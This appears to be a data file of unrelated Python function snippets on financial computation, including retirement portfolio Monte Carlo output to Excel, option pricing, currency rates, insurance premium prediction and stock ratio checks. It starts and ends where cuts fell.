value-----------------------------\n base_qcut = pd.DataFrame(index=sim_base_total.index, columns=cols)\n for c in range(len(cols)):\n base_qcut.loc[:, cols[c]] = sim_base_total.quantile(q_cut[c], axis=1)\n\n base_qcut.clip(lower=0, inplace=True)\n\n sim_base_total.clip(lower=0, inplace=True)\n\n # -------------------------------------quantile analysis for base income----------------------------\n base_income_qcut = pd.DataFrame(index=sim_base_income.index, columns=cols)\n for c in range(len(cols)):\n base_income_qcut.loc[:, cols[c]] = sim_base_income.quantile(q_cut[c], axis=1)\n\n # ----Remove NaN's prior to the income start years------------\n # base_income_qcut = base_income_qcut.loc[income_starts:]\n\n # ---------------------------------quantile analysis for portfolio terminal value ---------------\n\n port_qcut = pd.DataFrame(index=sim_port_total.index, columns=cols)\n for c in range(len(cols)):\n port_qcut.loc[:, cols[c]] = sim_port_total.quantile(q_cut[c], axis=1)\n\n port_qcut.clip(lower=0, inplace=True)\n\n # ----------------------------------quantile analysis for portfolio income----------------------------\n port_income_qcut = pd.DataFrame(index=sim_port_income.index, columns=cols)\n for c in range(len(cols)):\n port_income_qcut.loc[:, cols[c]] = sim_port_income.quantile(q_cut[c], axis=1)\n\n # ----Remove NaN's prior to the income start years------------\n # port_income_qcut = port_income_qcut.loc[income_starts:]\n\n # ----------probability ending value will be less than 0 at the end of the horizon -----------------------\n # base_legacy_risk = (sim_base_total.loc[sim_base_total.index[-1]] < 0).sum() / (trials)\n\n base_legacy_risk = (sim_base_total.loc[sim_base_total.index[life_expectancy - clients_age]] < 0).sum() / trials\n port_legacy_risk = (sim_port_total.loc[sim_port_total.index[life_expectancy - clients_age]] < 0).sum() / trials\n\n # port_legacy_risk = (sim_port_total.loc[sim_port_total.index[-1]] <= 0).sum() / (trials)\n\n legacy_risk = pd.DataFrame([base_legacy_risk, port_legacy_risk,\n 'Prob. 
of portfolio value less than 0 at the end of the expected life'],\n index=['base', 'fia_portfolio', 'Notes'],\n columns=['Ruin Probability'])\n\n # -----------Year-wise probability of ending value greater than 0 -----------------\n base_psuccess = sim_base_total.apply(lambda x: x > 0).sum(axis=1) / trials\n port_psuccess = sim_port_total.apply(lambda x: x > 0).sum(axis=1) / trials\n\n # -----------------------WRITING FILES TO EXCEL ---------------------------\n\n writer = pd.ExcelWriter(dest_simulation + method + '_leveled_growth_simulation.xlsx', engine='xlsxwriter')\n read_income_inputs.to_excel(writer, sheet_name='inputs_for_income')\n\n read_returns_est.to_excel(writer, sheet_name='asset_returns_estimates')\n # read_portfolio_inputs.to_excel(writer, sheet_name='portfolio_inputs')\n\n age_index = list(range(clients_age + 1, clients_age + len(base_qcut) + 1))\n # base_qcut.loc[:, 'clients_age'] = age_index\n # base_qcut.loc[:, 'comment'] = ''\n # base_qcut.loc[:, 'comment'] = np.where(base_qcut.clients_age == life_expectancy, 'expected_life', \"\")\n base_inv = float(read_income_inputs.loc['risky_assets', 'Base'])\n base_qcut.loc[:, 'age'] = age_index\n base_qcut.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n\n # -----------------------To start with year 0---------------------------------\n insert_col = [base_inv, base_inv, base_inv, base_inv, base_inv, base_inv,\n base_inv, clients_age, np.nan]\n base_qcut.loc[len(base_qcut) + 1, :] = 0.0\n base_qcut = base_qcut.shift(1)\n base_qcut.iloc[0] = insert_col\n base_qcut.reset_index(drop=True, inplace=True)\n base_qcut.to_excel(writer, sheet_name='base_ending_value_quantiles')\n # base_qcut.loc[income_starts:, :].to_excel(writer, sheet_name='base_ending_value_quantiles')\n\n # base_income_qcut = base_income_qcut[1:] base_income_qcut.loc[:, 'clients_age'] = age_index\n # base_income_qcut.loc[:, 'comment'] = '' base_income_qcut.loc[:, 'comment'] = np.where(\n # base_income_qcut.clients_age == life_expectancy, 'expected_life', \"\")\n\n base_income_qcut = base_income_qcut.loc[1:, :]\n base_income_qcut.loc[:, 'age'] = age_index\n base_income_qcut.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n base_income_qcut.loc[income_starts:, :].to_excel(writer, sheet_name='base_income_quantiles')\n\n # age_index = list(range(clients_age+1, clients_age + len(port_qcut)+1))\n # port_qcut.loc[:, 'clients_age'] = age_index\n # port_qcut.loc[:, 'comment'] = ''\n # port_qcut.loc[:, 'comment'] = np.where(port_qcut.clients_age == life_expectancy, 'expected_life', \"\")\n\n port_qcut.loc[:, 'age'] = age_index\n port_qcut.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n port_qcut.loc[len(port_qcut) + 1, :] = 0.0\n port_qcut = port_qcut.shift(1)\n port_qcut.iloc[0] = insert_col\n port_qcut.reset_index(drop=True, inplace=True)\n port_qcut.to_excel(writer, sheet_name='fia_port_ending_value_quantiles')\n # port_qcut.loc[income_starts:, :].to_excel(writer, sheet_name='fia_port_ending_value_quantiles')\n\n # port_income_qcut = port_income_qcut[1:] port_income_qcut.loc[:, 'clients_age'] = age_index\n # port_income_qcut.loc[:, 'comment'] = '' port_income_qcut.loc[:, 'comment'] = np.where(\n # port_income_qcut.clients_age == life_expectancy, 'expected_life', \"\")\n\n port_income_qcut = port_income_qcut.loc[1:, :]\n port_income_qcut.loc[:, 'age'] = age_index\n port_income_qcut.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n port_income_qcut.loc[income_starts:, :].to_excel(writer, 
sheet_name='fia_port_income_quantiles')\n\n prob_success_df = pd.concat([base_psuccess, port_psuccess], axis=1)\n prob_success_df.rename(columns={prob_success_df.columns[0]: 'prob(ending_value>0)_base',\n prob_success_df.columns[1]: 'prob(ending_value>0)_port'}, inplace=True)\n\n # prob_success_df.loc[:, 'clients_age'] = age_index\n # prob_success_df.loc[:, 'comment'] = ''\n # prob_success_df.loc[:, 'comment'] = np.where(prob_success_df.clients_age == life_expectancy, 'expected_life', \"\")\n\n prob_success_df.loc[:, 'age'] = age_index\n prob_success_df.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n prob_success_df.loc[:, 'prob(ending_value>lifetime_req income)_base'] = base_prob_of_success / trials\n prob_success_df.loc[:, 'prob(ending_value>lifetime_req income)_port'] = port_prob_of_success / trials\n prob_success_df.loc[:, 'prob(ending_value>next_year_req_income)_base'] = base_success_next_year / trials\n prob_success_df.loc[:, 'prob(ending_value>next_year_req_income)_port'] = port_success_next_year / trials\n prob_success_df.loc[:, 'base_max_portfolio_at_acturial_age'] = base_max_portfolio\n prob_success_df.loc[:, 'port_max_portfolio_at_acturial_age'] = port_max_portfolio\n\n # --------------------Percentile Portfolio's based on Acturial Life------------------------\n base_success = prob_success_df.loc[life_expectancy - clients_age, 'prob(ending_value>next_year_req_income)_base']\n port_success = prob_success_df.loc[life_expectancy - clients_age, 'prob(ending_value>next_year_req_income)_port']\n\n # acturial_age_base_tv = sim_base_total.loc[:life_expectancy - clients_age, ]\n # percentile_base_tv = sim_base_total.apply(lambda x: np.nanpercentile(x, base_success), axis=1)\n\n # ----------------Year wise percentile portfolio to meet next year income. Based on the success at acturial age.\n # Yearly portfolio values that can provide the next year income below the success rate at end of life (Percentile)-\n\n # acturial_age_base = base_for_next_year_need.loc[:life_expectancy - clients_age, ]\n # acturial_age_base = base_for_next_year_need.copy().fillna(0)\n percentile_base = base_for_next_year_need.apply(lambda x: np.nanpercentile(x, base_success), axis=1)\n\n # ----Pre Income Portfolio based on the Probab. of Success to meet next year's income at the end on the Act. Age\n base_pre_income_success = sim_base_total_preincome.apply(lambda x: np.nanpercentile(x, base_success), axis=1)\n base_ann_ret_pre_income = base_pre_income_success.pct_change().fillna(0)\n\n # acturial_age_port_tv = sim_port_total.loc[:life_expectancy - clients_age, ]\n # percentile_port_tv = sim_port_total.apply(lambda x: np.nanpercentile(x, port_success), axis=1)\n\n # ----------------Year wise percentile portfolio to meet next year income. Based on the success at acturial age.\n # Yearly portfolio values that can provide the next year income below the success rate at end of life (Percentile)-\n\n # acturial_age_port = port_for_next_year_need.loc[:life_expectancy - clients_age, ]\n # acturial_age_base = port_for_next_year_need.copy().fillna(0)\n percentile_port = port_for_next_year_need.apply(lambda x: np.nanpercentile(x, port_success), axis=1)\n\n # ----Pre Income Portfolio based on the Probab. of Success to meet next year's income at the end on the Act. 
Age\n port_pre_income_success = sim_port_total_preincome.apply(lambda x: np.nanpercentile(x, port_success), axis=1)\n port_ann_ret_pre_income = port_pre_income_success.pct_change().fillna(0)\n\n prob_success_df.loc[:, 'acturial_success_percentile_base_portfolio'] = percentile_base\n prob_success_df.loc[:, 'acturial_success_percentile_port_portfolio'] = percentile_port\n\n prob_success_df.loc[:, 'base_pre_income_ann_ret'] = base_ann_ret_pre_income\n prob_success_df.loc[:, 'port_pre_income_ann_ret'] = port_ann_ret_pre_income\n\n # prob_success_df.loc[:, 'terminalVal_success_percentile_base_portfolio'] = percentile_base_tv\n # prob_success_df.loc[:, 'terminalVal_success_percentile_port_portfolio'] = percentile_port_tv\n\n sim_base_total_preincome.to_excel(writer, sheet_name='base_preincome_portfolios')\n # -------Add premium to year 0 value to get total portfolio value---------\n sim_port_total_preincome.iloc[0] = sim_port_total_preincome.iloc[0] + premium\n sim_port_total_preincome.to_excel(writer, sheet_name='port_preincome_portfolios')\n\n # -------------For Simulation slide - BASE Portfolio - Can Delete --------------------\n # base_qcut_preinc = pd.DataFrame(index=sim_base_total_preincome.index, columns=cols)\n # for c in range(len(cols)):\n # base_qcut_preinc.loc[:, cols[c]] = sim_base_total_preincome.quantile(q_cut[c], axis=1)\n #\n # # -------------For Simulation slide - Proposed Portfolio --------------------\n # port_qcut_preinc = pd.DataFrame(index=sim_port_total_preincome.index, columns=cols)\n # for c in range(len(cols)):\n # port_qcut_preinc.loc[:, cols[c]] = sim_port_total_preincome.quantile(q_cut[c], axis=1)\n #\n # base_qcut_preinc.to_excel(writer, sheet_name='base_preincome_quantiles')\n # port_qcut_preinc.to_excel(writer, sheet_name='port_preincome_quantiles')\n\n prob_success_df.to_excel(writer, sheet_name='success_probability')\n\n # --------------BASE - Accumulation and Income Breakdown based on the success percentile portfolio---------------\n base_df.to_csv(src + 'base_port_detail.csv')\n sim_base_total.to_csv(src + 'base_ending_values.csv')\n income_breakdown_base = pd.DataFrame(sim_base_total.quantile(base_success, axis=1))\n income_breakdown_base.loc[:, 'income_from_risky_assets'] = sim_base_income.quantile(base_success, axis=1) \\\n - social - cpn_income_port\n income_breakdown_base.loc[:, 'guaranteed_income'] = 0.0\n income_breakdown_base.loc[:, 'social_security_income'] = social\n income_breakdown_base.loc[:, 'coupon_income'] = cpn_income_base\n\n income_breakdown_base.rename(columns={income_breakdown_base.columns[0]: 'portfolio_ending_value'}, inplace=True)\n income_breakdown_base.loc[:, 'income_from_risky_assets'][\n income_breakdown_base.loc[:, 'portfolio_ending_value'] <= 0] = 0\n income_breakdown_base.loc[:, 'total_income'] = income_breakdown_base.loc[:, income_breakdown_base.columns[1:]].sum(\n axis=1)\n\n # ----------FIA PORTFOLIO - Accumulation and Income Breakdown based on the success percentile portfolio-----------\n fia_portfolio_df.to_csv(src + 'fia_port_detail.csv')\n sim_port_total.to_csv(src + 'fiaport_ending_values.csv')\n\n income_breakdown_port = pd.DataFrame(sim_port_total.quantile(port_success, axis=1))\n income_breakdown_port.loc[:, 'income_from_risky_assets'] = sim_port_income.quantile(port_success, axis=1) \\\n - income_from_fia - social - cpn_income_port\n income_breakdown_port.loc[:, 'guaranteed_income'] = income_from_fia\n income_breakdown_port.loc[:, 'social_security_income'] = social\n income_breakdown_port.loc[:, 'coupon_income'] = 
cpn_income_port\n\n income_breakdown_port.rename(columns={income_breakdown_port.columns[0]: 'portfolio_ending_value'}, inplace=True)\n income_breakdown_port.loc[:, 'income_from_risky_assets'][\n income_breakdown_port.loc[:, 'portfolio_ending_value'] <= 0] = 0\n income_breakdown_port.loc[:, 'total_income'] = income_breakdown_port.loc[:, income_breakdown_port.columns[1:]].sum(\n axis=1)\n\n # -------------------Write simulation Statistics-------------------------------------\n simulation_stats.to_excel(writer, sheet_name='simulation_statistics')\n\n # port_psuccess.to_excel(writer, sheet_name='fia_port_success_probability')\n\n income_breakdown_base = income_breakdown_base.loc[1:, :]\n income_breakdown_base.loc[:, 'age'] = age_index\n income_breakdown_base.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n income_breakdown_base.loc[income_starts:, :].to_excel(writer, sheet_name='base_income_breakdown_median')\n\n income_breakdown_port = income_breakdown_port.loc[1:, :]\n income_breakdown_port.loc[:, 'age'] = age_index\n income_breakdown_port.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n income_breakdown_port.loc[income_starts:, :].to_excel(writer, sheet_name='fia_income_breakdown_median')\n\n legacy_risk.to_excel(writer, sheet_name='ruin_probability')\n\n # if method == 'normal':\n # median_returns_normal.loc[:, 'fia_median_returns'] = median_normal_fia\n # median_returns_normal.to_excel(writer, sheet_name='gr_port_median_normal')\n #\n # elif method == 'smallest':\n # median_returns_smallest.loc[:, 'fia_median_returns'] = median_smallest_fia\n # median_returns_smallest.to_excel(writer, sheet_name='gr_port_median_asc')\n #\n # else:\n # median_returns_largest.loc[:, 'fia_median_returns'] = median_largest_fia\n # median_returns_largest.to_excel(writer, sheet_name='gr_port_median_desc')\n\n # ---------------------Histogram for S&P Forecast---------------------------------------\n sp_returns = read_returns_est.loc['SPXT Index', 'Annualized Returns']\n sp_risk = read_returns_est.loc['SPXT Index', 'Annualized Risk']\n sp_random_ret = np.random.normal(loc=sp_returns, scale=sp_risk, size=10000)\n bins, data = np.histogram(sp_random_ret, bins=20)\n df_ret = pd.DataFrame(data, columns=['Return_range'])\n df_bins = pd.DataFrame(bins, columns=['Count'])\n df_hist = df_ret.join(df_bins)\n\n df_hist.to_excel(writer, sheet_name='sp500_histogram')\n writer.save()\n\n print(\"simulation completed....\")", "def calculate_buy_price(price: float):\n return round(price / (1 + CONF.trade_advantage_in_percent / 100), 1)", "def price_from_vol( self, vol ):\n if self._vol_type == \"LogNormal\":\n S = self._deal_terms[ \"underlyer\" ].spot_value\n K = self._deal_terms[ \"payoff\" ].payoff_terms[ \"strike\" ]\n time_to_mat = self._deal_terms[ \"maturity\" ] - self._pricing_date\n r = CSA_map[ self._deal_terms[ \"CSA\" ] ].short_rate\n d1 = 1 / ( vol * np.sqrt( time_to_mat ) ) * ( np.log( S / K ) + ( r + 0.5 * vol ** 2 ) * time_to_mat )\n d2 = d1 - vol * np.sqrt( time_to_mat ) \n CallPrice = S * norm.cdf( d1 ) - K * np.exp( -r * time_to_mat ) * norm.cdf( d2 ) \n\n if self._deal_terms[ \"payoff\" ].payoff_name == \"European Call\":\n return CallPrice\n elif self._deal_terms[ \"payoff\" ].payoff_name == \"European Put\":\n return CallPrice + K * np.exp( -r * time_to_mat ) - S \n else:\n raise NameError( \"Unsupported vol type : \" + self._deal_terms[ \"Payoff\" ].payoff_name )\n else:\n raise NameError( \"Unsupported vol type : \" + self._vol_type )", "def 
indexa_generate_currency_rates(self, parsed_data):\n Currency = self.env['res.currency']\n CurrencyRate = self.env['res.currency.rate']\n\n today = fields.Date.today()\n for company in self:\n for currency, (rate, date_rate) in parsed_data.items():\n rate_value = 1/rate\n\n currency_object = Currency.search([('name','=',currency)])\n already_existing_rate = CurrencyRate.search([\n ('currency_id', '=', currency_object.id),\n ('name', '=', date_rate),\n ('company_id', '=', company.id)\n ])\n if already_existing_rate:\n already_existing_rate.rate = rate_value\n else:\n CurrencyRate.create({'currency_id': currency_object.id,\n 'rate': rate_value,\n 'name': date_rate,\n 'company_id': company.id})", "def preprocess(data,scale):\n ##log_transformation\n #data['log_sale_price'] = np.log(data['sale_price'])\n #data['log_lot_area'] = np.log(data['lot_area'])\n #data['house_age'] = data['year_sold']- data['year_built']\n \n y = data['stay']\n \n #sales['log_sale_price'] = np.log(sales['sale_price'])\n #sales['log_lot_area'] = np.log(sales['lot_area'])\n #sales['house_age'] = sales['year_sold']- sales['year_built']\n data_dummy = data.copy()\n \n #dummy coding\n data_scale = pd.get_dummies(data_dummy).drop(columns = ['stay'])\n\n \n #scale the value\n if scale == True:\n S = StandardScaler().fit(data_scale)\n data_scale = S.transform(data_scale)\n \n return y, data_scale", "def populate_price_change_graph(market):\n data = list()\n labels = list()\n\n queryset = DailyStatistic.objects.filter(market=market).order_by('-date')[:10]\n\n for stat in queryset:\n try:\n data.append(round(stat.percent_change_dd*100))\n labels.append(\"{}.{}\".format(stat.date.day,stat.date.month))\n except TypeError:\n data.append(0)\n data.append('No data')\n\n\n data.reverse()\n labels.reverse()\n\n return data,labels", "def _prorata_rate(self, days_used, days_in_month):\n return (100 * days_used // days_in_month) / 100.0", "def calculateCurrentPercentageChange(self, Prices):\n threeDayMovingAverage = self.calculateLatestThreeDayMA(Prices)\n fifteenDayMovingAverage = self.calculateLatestFifteenDayMA(Prices)\n percentageChange = self.calculatePercentChange(\n fifteenDayMovingAverage, threeDayMovingAverage)\n return percentageChange", "def priceNormalize(self):\n # normalize feature 10, feature 11, feature 13\n # feature 0~7: flight number dummy variables\n # feature 8: departure date; feature 9: observed date state;\n # feature 10: minimum price; feature 11: maximum price\n # fearure 12: prediction(buy or wait); feature 13: price\n evalMatrix_train = np.concatenate((self.X_train, self.y_train, self.y_train_price), axis=1)\n evalMatrix_test = np.concatenate((self.X_test, self.y_test, self.y_test_price), axis=1)\n\n matrixTrain = np.empty(shape=(0, evalMatrix_train.shape[1]))\n matrixTest = np.empty(shape=(0, evalMatrix_train.shape[1]))\n for i in range(len(self.routes)):\n evalMatrix = evalMatrix_train[np.where(evalMatrix_train[:, i]==1)[0], :]\n evalMatrix[:, 10] *= self.currency[i]\n evalMatrix[:, 11] *= self.currency[i]\n evalMatrix[:, 13] *= self.currency[i]\n matrixTrain = np.concatenate((matrixTrain, evalMatrix), axis=0)\n\n evalMatrix = evalMatrix_test[np.where(evalMatrix_test[:, i]==1)[0], :]\n evalMatrix[:, 10] *= self.currency[i]\n evalMatrix[:, 11] *= self.currency[i]\n evalMatrix[:, 13] *= self.currency[i]\n matrixTest = np.concatenate((matrixTest, evalMatrix), axis=0)\n\n self.X_train = matrixTrain[:, 0:12]\n self.y_train = matrixTrain[:, 12]\n self.y_train_price = matrixTrain[:, 13]\n\n self.X_test = 
matrixTest[:, 0:12]\n self.y_test = matrixTest[:, 12]\n self.y_test_price = matrixTest[:, 13]\n\n self.y_train = self.y_train.reshape((self.y_train.shape[0], 1))\n self.y_train_price = self.y_train_price.reshape((self.y_train_price.shape[0], 1))\n self.y_test = self.y_test.reshape((self.y_test.shape[0], 1))\n self.y_test_price = self.y_test_price.reshape((self.y_test_price.shape[0], 1))", "def prepare_data(self):\r\n annual_df = self.annual_df\r\n coef_df = self.coef_df\r\n quarter_df = self.quarter_df\r\n # historical_df = self.historical_df\r\n Event_Buffer = self.Event_Buffer\r\n\r\n Tot_Prod = coef_df[\"Product\"].nunique()\r\n # Tot_Week = coef_df[\"wk\"].nunique()\r\n Tot_Week = 52\r\n\r\n EDLP_Events = list(annual_df[\"RP_Events\"])\r\n Min_EDLP_Events = [\r\n i - Event_Buffer if i - Event_Buffer >= 0 else 0 for i in EDLP_Events\r\n ]\r\n Max_EDLP_Events = [\r\n i + Event_Buffer if i + Event_Buffer < Tot_Week + 1 else Tot_Week\r\n for i in EDLP_Events\r\n ]\r\n\r\n TPR_Events = list(annual_df[\"TPR_Events\"])\r\n Min_TPR_Events = [\r\n i - Event_Buffer if i - Event_Buffer >= 0 else 0 for i in TPR_Events\r\n ]\r\n Max_TPR_Events = [\r\n i + Event_Buffer if i + Event_Buffer < Tot_Week + 1 else Tot_Week\r\n for i in TPR_Events\r\n ]\r\n\r\n Target_EDLP_Spend = [i for i in annual_df[\"PPG_RP_Spend\"]]\r\n Target_TPR_Spend = [i for i in annual_df[\"PPG_TPR_Spend\"]]\r\n Target_Trade_Spend = [i for i in annual_df[\"PPG_Total_Spend\"]]\r\n\r\n Mapping = {}\r\n Prod_Ind = coef_df[\"Product\"][0:Tot_Prod]\r\n for i, j in zip(Prod_Ind.index, Prod_Ind.values):\r\n Mapping[j] = i\r\n Mapping_reverse = {i: j for j, i in Mapping.items()}\r\n\r\n constants = [i for i in coef_df[\"constant\"]]\r\n\r\n Cat_Coef = coef_df[\"Catalogue\"][0:Tot_Prod]\r\n\r\n Disp_Coef = coef_df[\"Display\"][0:Tot_Prod]\r\n\r\n Base_Price_stg1 = [i for i in quarter_df[\"Final_baseprice\"]]\r\n Intercepts_stg1 = []\r\n for pr in range(Tot_Prod):\r\n Intercepts_stg1.append(\r\n np.mean([constants[j * Tot_Prod + pr] for j in range(0, Tot_Week)])\r\n )\r\n\r\n Base_Price_stg2 = [[i] * Tot_Week for i in quarter_df[\"Final_baseprice\"]]\r\n Intercepts_stg2 = [\r\n constants[j : j + Tot_Prod] for j in range(0, len(constants), Tot_Prod)\r\n ] # noqa\r\n\r\n EDLP_Coef = np.array(\r\n coef_df[[i for i in coef_df.columns if i.count(\"Retailer_Regular\") == 1]]\r\n )\r\n TPR_Coef = np.array(\r\n coef_df[[i for i in coef_df.columns if i.count(\"Retailer_Promoted\") == 1]]\r\n )\r\n\r\n # ################################ Available EDLP Interactions pairs ##############################\r\n\r\n EDLP = [\r\n re.findall(r\"[0-9]+\", i)\r\n for i in coef_df.columns\r\n if i.count(\"Retailer_Regular\") > 1\r\n ]\r\n EDLP_Interactions = []\r\n for i in EDLP:\r\n temp = []\r\n for j in i:\r\n temp.append(int(j))\r\n EDLP_Interactions.append(temp)\r\n\r\n # ###################################### Available TPR Interactions pairs #########################\r\n\r\n TPR = [\r\n re.findall(r\"[0-9]+\", i)\r\n for i in coef_df.columns\r\n if i.count(\"Retailer_Promoted\") > 1\r\n ]\r\n TPR_Interactions = []\r\n for i in TPR:\r\n temp = []\r\n for j in i:\r\n temp.append(int(j))\r\n TPR_Interactions.append(temp)\r\n\r\n # ###################################### EDLP_Interaction_Coef_Values ############################\r\n\r\n EDLP_Int_Coef_Values = {}\r\n for col in coef_df.columns:\r\n if col.count(\"Retailer_Regular\") > 1:\r\n Pair_name = \"_\".join([str(int(i)) for i in re.findall(r\"[0-9]+\", col)])\r\n EDLP_Int_Coef_Values[Pair_name] = 
list(coef_df[col])\r\n\r\n # ###################################### TPR_Interaction_Coef_Values #############################\r\n\r\n TPR_Int_Coef_Values = {}\r\n for col in coef_df.columns:\r\n if col.count(\"Retailer_Promoted\") > 1:\r\n Pair_name = \"_\".join([str(int(i)) for i in re.findall(r\"[0-9]+\", col)])\r\n TPR_Int_Coef_Values[Pair_name] = list(coef_df[col])\r\n\r\n # ##################################### Loading Pantry Loading Coefficients #######################\r\n\r\n Pantry_1 = list(coef_df[\"Pantry_Loading_1\"])\r\n Pantry_1 = [\r\n Pantry_1[j : j + Tot_Prod] for j in range(0, len(Pantry_1), Tot_Prod)\r\n ]\r\n Pantry_2 = list(coef_df[\"Pantry_Loading_2\"])\r\n Pantry_2 = [\r\n Pantry_2[j : j + Tot_Prod] for j in range(0, len(Pantry_2), Tot_Prod)\r\n ]\r\n\r\n # TE_Coeff = np.array(Promo_df[[\"TE_Promo\",\"TE_NoPromo\"]])\r\n self.Tot_Prod = Tot_Prod\r\n self.Tot_Week = Tot_Week\r\n self.EDLP_Events = EDLP_Events\r\n self.Min_EDLP_Events = Min_EDLP_Events\r\n self.Max_EDLP_Events = Max_EDLP_Events\r\n self.TPR_Events = TPR_Events\r\n self.Min_TPR_Events = Min_TPR_Events\r\n self.Max_TPR_Events = Max_TPR_Events\r\n\r\n self.Target_EDLP_Spend = Target_EDLP_Spend\r\n self.Target_TPR_Spend = Target_TPR_Spend\r\n self.Target_Trade_Spend = Target_Trade_Spend\r\n self.Mapping = Mapping\r\n self.Mapping_reverse = Mapping_reverse\r\n self.constants = constants\r\n self.EDLP_Coef = EDLP_Coef\r\n self.TPR_Coef = TPR_Coef\r\n\r\n self.EDLP_Interactions = EDLP_Interactions\r\n self.TPR_Interactions = TPR_Interactions\r\n self.EDLP_Int_Coef_Values = EDLP_Int_Coef_Values\r\n self.TPR_Int_Coef_Values = TPR_Int_Coef_Values\r\n self.Pantry_1 = Pantry_1\r\n self.Pantry_2 = Pantry_2\r\n\r\n self.Base_Price_stg1 = Base_Price_stg1\r\n self.Intercepts_stg1 = Intercepts_stg1\r\n self.Base_Price_stg2 = Base_Price_stg2\r\n self.Intercepts_stg2 = Intercepts_stg2\r\n\r\n self.Cat_Coef = Cat_Coef\r\n self.Disp_Coef = Disp_Coef", "def add_change_features(df):\n # copy input for comparison of outputs\n df_copy = df.copy()\n\n # calculate interval change features\n df_copy[\"Duration_Start\"] = (\n df_copy[\"Schedule_Start\"] - df_copy[\"Design_Start\"]\n ).dt.days\n df_copy[\"Duration_End\"] = (\n df_copy[\"Schedule_End\"] - df_copy[\"Design_Start\"]\n ).dt.days\n df_copy[\"Schedule_Change\"] = (\n df_copy[\"Duration_End\"] - df_copy[\"Duration_Start\"]\n )\n df_copy[\"Budget_Change\"] = df_copy[\"Budget_End\"] - df_copy[\"Budget_Start\"]\n\n # define schedule change ratio\n df_copy[\"Schedule_Change_Ratio\"] = (\n df_copy[\"Schedule_Change\"] / df_copy[\"Duration_Start\"]\n )\n # define budget change ratio\n df_copy[\"Budget_Change_Ratio\"] = (\n df_copy[\"Budget_Change\"] / df_copy[\"Budget_Start\"]\n )\n\n # define project metrics\n df_copy[\"Budget_Abs_Per_Error\"] = (\n df_copy[\"Budget_Start\"] - df_copy[\"Budget_End\"]\n ).abs() / df_copy[\"Budget_End\"]\n\n df_copy[\"Budget_Rel_Per_Error\"] = (\n df_copy[\"Budget_Start\"] - df_copy[\"Budget_End\"]\n ).abs() / df_copy[\"Budget_Start\"]\n\n df_copy[\"Duration_End_Ratio\"] = (\n df_copy[\"Duration_End\"] / df_copy[\"Duration_Start\"]\n )\n df_copy[\"Budget_End_Ratio\"] = (\n df_copy[\"Budget_End\"] / df_copy[\"Budget_Start\"]\n )\n\n # previously titled 'Mark Metric'\n df_copy[\"Duration_Ratio_Inv\"] = (\n df_copy[\"Duration_Start\"] / df_copy[\"Duration_End\"]\n ) - 1\n df_copy[\"Budget_Ratio_Inv\"] = (\n df_copy[\"Budget_Start\"] / df_copy[\"Budget_End\"]\n ) - 1\n\n return df_copy", "def predict_premium(self, X_raw):\n # 
=============================================================\n # You can include a pricing strategy here\n # For example you could scale all your prices down by a factor\n\n # YOUR CODE HERE\n\n # Remember to include a line similar to the one below\n # X_clean = self._preprocessor(X_raw)\n \n X, drop_index = self._preprocessor(X_raw, train=False)\n if len(drop_index) > 0:\n print(\"Some rows of X_raw contain NAs, the corresponding rows are skipped\")\n \n #claim_made = self.Model_made.predict(X)\n claim_made = self.Model_made.predict_proba(X)[:,1]\n #print(sum(claim_made>0.28))\n \n decision_threshold = 0.28 #90% boundary\n \n #claim_made = np.where(claim_made>decision_threshold, 1, 0).reshape(-1)\n claim_made = np.where(claim_made>decision_threshold, 1, 0)\n claim_amount = np.repeat(80,len(claim_made))\n claim_made_idx = np.arange(len(claim_made))[claim_made == 1]\n \n X_claim_amount = X[claim_made_idx,:]\n #pred = self.Model_claim.predict(X_claim_amount).reshape(-1)\n pred = self.Model_claim.predict(X_claim_amount)*self.y_std + self.y_mean\n claim_amount[claim_made == 1] = np.round(pred,4)\n prediction = pd.DataFrame({\"claim_amount\":claim_amount})\n return prediction", "async def score(self, ctx):\r\n with DB() as db:\r\n companies = db.query(Company).filter(Company.active == True).all()\r\n scores = []\r\n for company in companies:\r\n history = db.query(CompanyHistory).filter(CompanyHistory.company == company.id).order_by(CompanyHistory.date.desc()).first()\r\n scores.append([company.name, round(history.value, 2)])\r\n headers = ['Company', 'Net Worth']\r\n score_df = pd.DataFrame(scores, columns=headers)\r\n score_df = score_df.sort_values(['Net Worth'], ascending=False)\r\n aggregated = tabulate(score_df.values.tolist(), headers=headers)\r\n await ctx.send(f\"```{aggregated}```\")", "def tx_fees_VS_miners_revenue(df):\n\n miners_revenue_USD = df['Miners Revenue (USD)']\n tx_fees_USD = df['Tx fees (USD)']\n result = tx_fees_USD.div(miners_revenue_USD)\n result.name = 'Tx Fees / Miners Revenue'\n return out(SETTINGS, df, result)", "def price_to_3_year_earnings_less_than_15(self):\n\n note = ''\n # check if 'EPS' exists\n if 'EPS' not in self.stock.main_df.columns:\n note = note + 'Could not find EPS on MacroTrends. '\n\n # check if Current price is not 0\n if self.stock.stats_dict['Current Price'] == 0:\n note = note + 'Could not find current price on MacroTrends. 
'\n\n if note != '':\n self.stock.append_calc_result('3 year P/E ratio < 15 ?', 'N/A', 'N/A', note)\n return\n\n curr_price = self.stock.stats_dict['Current Price']\n df = self.stock.main_df\n\n average = 0\n # i want to use 2020 if not empty and 2019 if 2020 is empty\n if not np.isnan(df.iloc[0]['EPS']):\n # current year is there\n past_3_years_df = df.iloc[0: 3]['EPS']\n average = past_3_years_df.mean()\n elif np.isnan(df.iloc[0]['EPS']):\n # current year is not there\n past_3_years_df = df.iloc[1: 4]['EPS']\n average = past_3_years_df.mean()\n if np.isnan(df.iloc[1]['EPS']):\n # past year is not there either\n past_7_years_df = df.iloc[2: 5]['EPS']\n average = past_7_years_df.mean()\n if np.isnan(df.iloc[2]['EPS']):\n self.stock.append_calc_result('7 year P/E ratio < 25 ?', 'N/A', 'N/A',\n 'Must not have filed their annual report for {}'.format(\n self.current_year - 2))\n return\n\n if average == 0:\n self.stock.append_calc_result('3 year P/E ratio < 15 ?', 'N/A', 'N/A',\n 'No average found')\n return\n elif (curr_price / average) <= 15:\n criteria_passed = 'Yes'\n else:\n criteria_passed = 'No'\n\n self.stock.append_calc_result('3 year P/E ratio < 15 ?', round((curr_price / average), 2),\n criteria_passed, '3 Year Average EPS = {}'.format(round(average, 2)))", "def sub_tax_sales_transfer_pricing(manager, df_fields, seq_recs, 